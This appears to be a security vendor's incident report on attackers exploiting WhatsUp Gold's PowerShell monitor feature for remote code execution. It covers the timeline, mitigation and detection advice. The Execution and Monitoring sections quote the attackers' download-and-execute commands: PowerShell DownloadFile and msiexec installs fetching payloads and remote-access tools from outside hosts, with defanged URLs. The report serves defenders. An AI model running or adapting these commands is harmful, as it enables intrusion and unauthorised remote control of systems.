Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities
How attacks were observed in Trend Vision One
Initial access
Activity monitoring on Trend Vision One showed that a suspicious script retrieved from a suspicious URL was suddenly executed on the computer hosting WhatsUp Gold. The timeline prior to the incident showed no suspicious logon events, suspicious URLs accessed by users, or malware execution. These are typical events in the early stages of incidents, but if these have not appeared, it’s more likely that a vulnerability has been involved.
The polling process NmPoller.exe, the WhatsUp Gold executable, seems to be able to host a script called Active Monitor PowerShell Script as a legitimate function (Figure 2). The threat actors in this case chose it to perform for remote arbitrary code execution.
The malicious code that was executed by NmPoller.exe looks like this: The first part of the square is the prefix, and the last two lines are the malicious code submitted by the threat actor. Several variations of this part have been observed, as shown in Figure 3.
Execution
Multiple PowerShell scripts were executed via NmPoller.exe. The following scripts were executed as the malicious part multiple times combined with the prefix part described in the previous section:
(New-Object System.Net.WebClient).DownloadFile(‘hxxps://webhook[.]site/b6ef7410-9ec8-44f7-8cdf-7890c1cf5837′,’c:\\programdata\\a.ps1’); powershell -exec bypass -file c:\\programdata\\a.ps1
msiexec /i hxxp://45.227.255[.]216:29742/ddQCz2CkW8/setup.msi /Qn
msiexec /i hxxps://fedko[.]org/wp-includes/ID3/setup.msi /Qn
iwr -uri hxxps://fedko[.]org/wp-includes/ID3/setup.msi -outfile c:\\windows\\temp\\MSsetup.msi ; msiexec /i c:\\windows\\temp\\MSsetup.msi /Qn
The file a.ps1 contained only one line:
[“(New-Object System.Net.WebClient).DownloadFile(‘hxxp://185.123.100[.]160/access/Remote Access-windows64-offline.exe?language=en&app=61021689825303726412222891579678345108&hostname=hxxp://185.123.100[.]160′,’C:\\programdata\\ftpd32.exe’);start-process C:\\programdata\\ftpd32.exe;”]
Persistence
In this case, the threat actor aimed to install remote administration tools through PowerShell. They attempted to install these four remote access tools (RATs) via msiexec.exe (Figure 4):
- Atera Agent
- Radmin
- SimpleHelp Remote Access
- Splashtop Remote
Atera Agent and Splashtop Remote were installed by a single msi installer retrieved from the URL, hxxps://fedko[.]org/wp-includes/ID3/setup.msi.
The incident was contained by MXDR team and no further impacts were observed. The threat actor has not yet been identified; however, the usage of multiple RATs suggests that it may be a ransomware actor.
Vulnerability discovery and exploit attempts
Event timeline
- August 16, 2024 – The product vendor released the latest patch and the CVE numbers
- August 30, 2024 5pm (UTC) – The discoverer of the vulnerability published the PoC on GitHub
- August 30, 2024 10pm (UTC) – Trend Micro MXDR team observed the first incident that abused the legitimate process of WhatsUp Gold
This timeline suggests that the exploit attempts may have been performed on the same day, just a few hours after the PoC was published. The PoC was released on the Friday before the long weekend in the US, which included a holiday, so it may have been difficult for many organizations to apply the patch immediately. However, the latest patch was provided before the PoC was released, so if there is information such as a fix high-severity vulnerability in the patch, planning to apply the patch early should help prevent damage even if no PoC is available.
Censys has issued an advisory that they observed 1,207 exposed devices online for CVE-2024-4885, another WhatsUp Gold vulnerability that has a CVSS score of 9.8 and was fixed in June. This may have attracted the attention of threat actors as an attack surface following the disclosure of serious vulnerabilities in June.
Mitigation
The affected host was affected due to the compromise of user authentication for WhatsUp Gold. Users of the product should take the following steps to avoid a similar impact:
- Apply the latest patch as soon as possible. Official documentation on the product, such as release notes and security bulletins, can be found on the vendor website.
- Keep the management console or API endpoints under access control. Avoid exposing corporate use products to the public internet to prevent to be found and scanned by threat actors.
- Use a strong password. Please note that even if you have already applied all patches and are not affected by the vulnerability, you could still be affected if you use a weak password (such as admin:admin) without access control.
Monitoring
To detect the attacks that we observed, we monitored process creation events from the following processes:
- {Install path for WhatsUp Gold}\nmpoller.exe
For example, if C:\Program Files (x86)\Ipswitch\WhatsUp\nmpoller.exe creates processes like the following, it is highly suspicious:
- “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -exec bypass -file c:\programdata\a.ps1
- “C:\Windows\system32\msiexec.exe” /i hxxps://fedko[.]org/wp-includes/ID3/setup.msi /Qn
- “C:\Windows\system32\msiexec.exe” /i hxxp://45.227.255[.]216:29742/ddQCz2CkW8/setup.msi /Qn
- “C:\Windows\system32\msiexec.exe” /i c:\windows\temp\MSsetup.msi /Qn
Query sample for Vision One Search app
- Search method: Endpoint Activity Data
- Query: “nmpoller.exe” AND eventSubId:(2 OR 101 OR 109 OR 901)
- Monitoring tips:
- Product restarting or daily logfile creation events will also appear in the results. Please monitor the events excluding regular events in your environment.
- You can also monitor for spikes in the number of events in the search result (Figure 5).
Observed attack techniques (OAT) detected using Vision One:
- External MSI Package Installation via Msiexec (High)
- Suspicious RAT (SimpleHelp) Installation (Medium)
- Suspicious RAT (AteraAgent) Installation (Medium)
- Suspicious RAT (Splashtop) File Creation (Medium)
- Malicious Software – PUA.Win32.RAdmin.E (Medium)
Please note that in the implementation, NmPoller.exe can execute PowerShell scripts without launching another powershell.exe process. If you can monitor PowerShell scripts with Antimalware Scan Interface (AMSI), verify that all scripts executed by WhatsUp Gold’s Active Monitor PowerShell Script function are the ones you expect. To reduce the monitoring effort, it is also a good idea to suspend the use of Active Monitor PowerShell Script function until the latest patch is applied.
Also, because the vulnerability CVE-2024-6670 is described as allowing the compromise of the user account, it is quite possible that attacks would be observed as other events. Considering this, until the latest patch is applied, it is worth tightening access controls to WhatsUp Gold as much as possible and closely monitoring the events of all related processes.
Conclusion
Patch management is still important but always difficult. In this case, the PoC was published several days after the patch was released, and an incident that appeared to be affected by the vulnerability was observed on the same day, just a few hours after published. This observed fact shows that if the vulnerability being fixed is marked as severe, it is strongly encouraged to apply the patch as soon as it is released, even if no PoC is available.
The key to preventing incidents like this are not limited to patch management. There should be several defenses in place in addition patch management. The most common defenses to mitigate risks are access control and multi-factor authentication (MFA), which security teams can apply through best practices like:
- Keeping hosts/services for corporate use under access control instead of public access
- Do not expose to the public internet the management consoles or API endpoints of products for corporate use to avoid being on threat actors scan lists.
- Enabling MFA for all network logins
- To prevent account compromise, all user accounts (whether for enterprise or personal use) logging on over the network, or logging into Windows, Linux, or web applications, are encouraged to always have MFA enabled.
- Of course, do not forget to use a strong password that has never been used in other places.
- Using passkeys
- If you have the option to use a passkey instead of a password, it would be a good idea to do so.
- Passkeys use a cryptographic key stored on the device for logins and the key is activated by local authentication such as users’ biometric just like unlocking the device. Since no need for any passwords or any typing, it means no strings of characters are involved, it is resistant to phishing.
Maintaining a daily readiness and vigilance against cyberattacks is essential to ensuring that emergency response is targeted only at things that truly require it. We hope that after reading this article, security teams will once again check that no unintended hosts or services are exposed to the public internet as part of their peacetime preparations. This approach is now known as part of attack surface management.
Organizations can also consider powerful security technologies such as Trend Vision One™, which offers multilayered protection and behavior detection, helping block malicious tools and services before they can inflict damage on user machines and systems.
Read More HERE